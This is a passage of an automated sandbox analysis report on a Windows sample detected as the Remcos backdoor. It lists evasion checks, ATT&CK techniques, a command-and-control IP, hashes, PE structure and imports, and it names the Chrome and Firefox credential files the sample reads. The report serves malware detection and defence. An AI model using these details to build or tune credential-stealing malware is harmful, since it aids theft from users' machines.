                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe TID: 5500 Thread sleep count: 4850 > 30
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe TID: 5500 Thread sleep time: -14550000s >= -30000s
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0044D5E9 FindFirstFileExA,1_2_0044D5E9
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe API call chain: ExitProcess graph end node graph_1-47305
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A65D
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BCE3
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00442554 mov eax, dword ptr fs:[00000030h] 1_2_00442554
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0044E92E GetProcessHeap,1_2_0044E92E
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00434168
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A65D
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00433B44
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00433CD7 SetUnhandledExceptionFilter,1_2_00433CD7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 1_2_00410F36
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00418754 mouse_event,1_2_00418754
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00433E0A cpuid 1_2_00433E0A
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: EnumSystemLocalesW,1_2_004470AE
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: GetLocaleInfoW,1_2_004510BA
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004511E3
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: GetLocaleInfoW,1_2_004512EA
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_004513B7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: GetLocaleInfoW,1_2_00447597
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: GetLocaleInfoA,1_2_0040E679
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00450A7F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: EnumSystemLocalesW,1_2_00450CF7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: EnumSystemLocalesW,1_2_00450D42
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: EnumSystemLocalesW,1_2_00450DDD
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00450E6A
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_00404915 GetLocalTime,CreateEventA,CreateThread,1_2_00404915
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0041A7A2 GetComputerNameExW,GetUserNameW,1_2_0041A7A2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: 1_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_0044800F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara match; File source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
                      Source: Yara match; File source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 1_2_0040B21B
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 1_2_0040B335
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: \key3.db 1_2_0040B335

                      Remote Access Functionality

                      barindex
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-4NJUM7
                      Source: Yara match; File source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
                      Source: Yara match; File source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match; File source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match; File source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match; File source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe Code function: cmd.exe 1_2_00405042
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 11 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                      Credentials | Domains | Default Accounts | 12 Command and Scripting Interpreter | 1 Windows Service | 1 Bypass User Account Control | 2 Obfuscated Files or Information | 111 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 111 Input Capture | 2 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
                      Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | Logon Script (Windows) | 1 Access Token Manipulation | 1 DLL Side-Loading | 2 Credentials In Files | 1 System Service Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Windows Service | 1 Bypass User Account Control | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Process Injection | 1 Virtualization/Sandbox Evasion | LSA Secrets | 23 System Information Discovery | SSH | Keylogging | 1 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Access Token Manipulation | Cached Domain Credentials | 21 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Process Injection | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                      Source | Detection | Scanner | Label
                      1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | 88% | ReversingLabs | Win32.Backdoor.Remcos
                      1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | 100% | Avira | BDS/Backdoor.Gen
                      1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | 100% | Joe Sandbox ML |
                      No Antivirus matches
                      No contacted domains info
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://geoplugin.net/json.gp | 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | false | | high
                      http://geoplugin.net/json.gp/C | 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | false | | high
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      104.243.246.120 | unknown | United States | 3223 | VOXILITYGB | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1570007
                          Start date and time:2024-12-06 14:10:09 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 29s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:4
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 25
                          • Number of non-executed functions: 204
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • VT rate limit hit for: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
                      Time | Type | Description
                      08:11:53 | API Interceptor | 4642989x Sleep call for process: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe modified
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      104.243.246.120 | 1730537046a28265099d74997f6aaf573f6441587128b68a620c5fd7396901e33fe86509f2931.dat-decoded.exe | malicious | Njrat |
                      No context
                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                      VOXILITYGB | nabsh4.elf | malicious | Unknown | 46.243.206.70
                      VOXILITYGB | 7jBzTH9FXQ.exe | malicious | Unknown | 37.221.166.158
                      VOXILITYGB | fACYdCvub8.exe | malicious | Unknown | 5.254.60.108
                      VOXILITYGB | powerpc.nn.elf | malicious | Mirai, Okiru | 37.221.160.225
                      VOXILITYGB | Bank Information Details.bat | malicious | LodaRAT, XRed | 172.111.138.100
                      VOXILITYGB | 1730537046a28265099d74997f6aaf573f6441587128b68a620c5fd7396901e33fe86509f2931.dat-decoded.exe | malicious | Njrat | 104.243.246.120
                      VOXILITYGB | Purchase Order Supplies.Pdf.exe | malicious | LodaRAT | 172.111.138.100
                      VOXILITYGB | zR4aIjCuRs.exe | malicious | Remcos, GuLoader | 45.74.58.7
                      VOXILITYGB | 5s5Ut98vVh.bat | malicious | Unknown | 172.94.3.25
                      VOXILITYGB | Marys Organizer 2023 Release.zip | malicious | Remcos | 45.74.48.2
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.586438598430375
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
                            File size:493'056 bytes
                            MD5:68011a26bb98d3b77de9594ae7624358
                            SHA1:e065720bd4e4299160f7cbbee1708cd91140dff1
                            SHA256:6a050c9c875f5748908ab6c4ced355dd530137e98f3b28f06807c454c52a6dbe
                            SHA512:64359e2919b69ca62a83463ea6e7a58f7adb76ab6db936cf92780a4c971810e8f060f109ce4432f2e0f51cbd31cbf8d68c6ee6beb46106034521beb1ddc1dd89
                            SSDEEP:12288:XuD09AUkNIGBYYv4eK13x13nZHSRVMf139F5wIB7+IwtHwBtVxbesvZDSU+DY:K09AfNIEYsunZvZ19ZPs
                            TLSH:6BA4BF01B6D2C072D57625300D26E775DEBDBD212835897BB3DA1D67FE30180E63AAB2
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H....*..H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H.
                            Icon Hash:95694d05214c1b33
                            Entrypoint:0x433b3a
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x6724916B [Fri Nov 1 08:29:31 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:e77512f955eaf60ccff45e02d69234de
                            Instruction
                            call 00007EFF70C2FFF3h
                            jmp 00007EFF70C2F94Fh
                            push ebp
                            mov ebp, esp
                            sub esp, 00000324h
                            push ebx
                            push 00000017h
                            call 00007EFF70C51E29h
                            test eax, eax
                            je 00007EFF70C2FAD7h
                            mov ecx, dword ptr [ebp+08h]
                            int 29h
                            push 00000003h
                            call 00007EFF70C2FC94h
                            mov dword ptr [esp], 000002CCh
                            lea eax, dword ptr [ebp-00000324h]
                            push 00000000h
                            push eax
                            call 00007EFF70C31FABh
                            add esp, 0Ch
                            mov dword ptr [ebp-00000274h], eax
                            mov dword ptr [ebp-00000278h], ecx
                            mov dword ptr [ebp-0000027Ch], edx
                            mov dword ptr [ebp-00000280h], ebx
                            mov dword ptr [ebp-00000284h], esi
                            mov dword ptr [ebp-00000288h], edi
                            mov word ptr [ebp-0000025Ch], ss
                            mov word ptr [ebp-00000268h], cs
                            mov word ptr [ebp-0000028Ch], ds
                            mov word ptr [ebp-00000290h], es
                            mov word ptr [ebp-00000294h], fs
                            mov word ptr [ebp-00000298h], gs
                            pushfd
                            pop dword ptr [ebp-00000264h]
                            mov eax, dword ptr [ebp+04h]
                            mov dword ptr [ebp-0000026Ch], eax
                            lea eax, dword ptr [ebp+04h]
                            mov dword ptr [ebp-00000260h], eax
                            mov dword ptr [ebp-00000324h], 00010001h
                            mov eax, dword ptr [eax-04h]
                            push 00000050h
                            mov dword ptr [ebp-00000270h], eax
                            lea eax, dword ptr [ebp-58h]
                            push 00000000h
                            push eax
                            call 00007EFF70C31F21h
                            Programming Language:
                            • [C++] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                             Name | Virtual Address | Virtual Size | Is in Section
                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6e020 | 0x104 | .rdata
                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x76000 | 0x4af8 | .rsrc
                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7b000 | 0x3b80 | .reloc
                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x6c510 | 0x38 | .rdata
                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_TLS | 0x6c5e8 | 0x18 | .rdata
                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x6c548 | 0x40 | .rdata
                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IAT | 0x57000 | 0x4f4 | .rdata
                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                             .text | 0x1000 | 0x55f1d | 0x56000 | 30cda225e02a0d4dab478a6c7c094860 | False | 0.5738610555959303 | data | 6.62127843313247 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                             .rdata | 0x57000 | 0x18b00 | 0x18c00 | 9800e1a5325bb58aa054e318c8bb055a | False | 0.49812578914141414 | OpenPGP Secret Key Version 6 | 5.758930104385571 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                             .data | 0x70000 | 0x5d6c | 0xe00 | 06414e748130e7e668ba2ba172d63448 | False | 0.22684151785714285 | data | 3.093339598098017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .rsrc | 0x76000 | 0x4af8 | 0x4c00 | 268090dc0722e44a1d7d2c85bbe2d2db | False | 0.2793996710526316 | data | 3.987098222533729 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                             .reloc | 0x7b000 | 0x3b80 | 0x3c00 | 3a880743591ae3410d0dc26d7322ddd0 | False | 0.7569661458333333 | data | 6.695050823503309 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                             Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                             RT_ICON | 0x7618c | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.3421985815602837
                             RT_ICON | 0x765f4 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.27704918032786885
                             RT_ICON | 0x76f7c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.23686679174484052
                             RT_ICON | 0x78024 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.22977178423236513
                             RT_RCDATA | 0x7a5cc | 0x4ea | data | | | 1.0087440381558028
                             RT_GROUP_ICON | 0x7aab8 | 0x3e | data | English | United States | 0.8064516129032258
                             DLL | Imports
                             KERNEL32.dll | ExpandEnvironmentStringsA, GetLongPathNameW, CopyFileW, GetLocaleInfoA, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, HeapAlloc, GetProcessHeap, FreeLibrary, IsBadReadPtr, GetTempPathW, OpenProcess, OpenMutexA, lstrcatW, GetCurrentProcessId, GetTempFileNameW, GetSystemDirectoryA, GlobalAlloc, GlobalLock, GetTickCount, GlobalUnlock, WriteProcessMemory, ResumeThread, GetThreadContext, ReadProcessMemory, CreateProcessW, SetThreadContext, LocalAlloc, GlobalFree, MulDiv, SizeofResource, QueryDosDeviceW, FindFirstVolumeW, GetConsoleScreenBufferInfo, SetConsoleTextAttribute, lstrlenW, GetStdHandle, SetFilePointer, FindResourceA, LockResource, LoadResource, LocalFree, FindVolumeClose, GetVolumePathNamesForVolumeNameW, lstrcpyW, SetConsoleOutputCP, FormatMessageA, FindFirstFileA, AllocConsole, lstrcmpW, GetModuleFileNameA, lstrcpynA, QueryPerformanceFrequency, QueryPerformanceCounter, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, HeapSize, WriteConsoleW, SetStdHandle, SetEnvironmentVariableW, SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, 